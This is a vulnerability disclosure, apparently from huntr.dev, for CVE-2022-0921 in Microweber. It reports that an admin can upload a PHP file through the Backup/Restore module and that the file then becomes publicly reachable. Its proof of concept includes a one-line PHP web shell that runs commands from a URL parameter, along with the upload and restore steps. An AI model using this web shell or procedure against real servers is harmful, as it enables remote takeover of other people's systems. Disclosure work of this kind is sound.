Lucene search
QuandqnE368BE37-1CB4-4292-8D48-07132725F622HistoryMar 09, 2022 - 6:14 p.m.
Abusing Backup/Restore feature to achieve Remote Code Execution
2022-03-0918:14:16
quandqn
www.huntr.dev
16
admin
backup module
remote code execution
malicious php file
upload
restore
import format not supported
userfiles
rce
impact
EPSS
0.001
Percentile
44.0%
Description
Admin can use Backup modules to upload a malicious PHP file, which can lead to RCE.
Proof of Concept
- Log in as admin, navigate to Modules ->Backup:
https://demo.microweber.org/demo/admin/view:modules/load_module:admin__backup
- Prepare a malicious PHP file, in this case
info2.php
<?php system($_GET['cm']); ?>
- Compress this file to
info2php.zip, then clickUpload your backup.
- After successfully uploaded, click to Restore, chooseTry to overwrite content by Names & Titles, thenStart Restore
- The system returns Import format not supported
- However, the malicious file
info2.phpis unzipped and located in/userfiles/, and that malicious PHP file can be accessible by anyone:
Impact
Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.
Related
veracode
veracode
Remote Code Execution (RCE)
2022-03-14 10:28:03
osv
osv
Unrestricted Upload of File with Dangerous Type in Microweber
2022-03-12 00:00:30
CVE-2022-0921
2022-03-11 18:15:29
prion
prion
Design/Logic Flaw
2022-03-11 18:15:00
cve
cve
CVE-2022-0921
2022-03-11 18:15:29
github
github
Unrestricted Upload of File with Dangerous Type in Microweber
2022-03-12 00:00:30
cvelist
cvelist
nvd
nvd
CVE-2022-0921
2022-03-11 18:15:29
cnvd
cnvd
Microweber remote code execution vulnerability
2022-03-15 00:00:00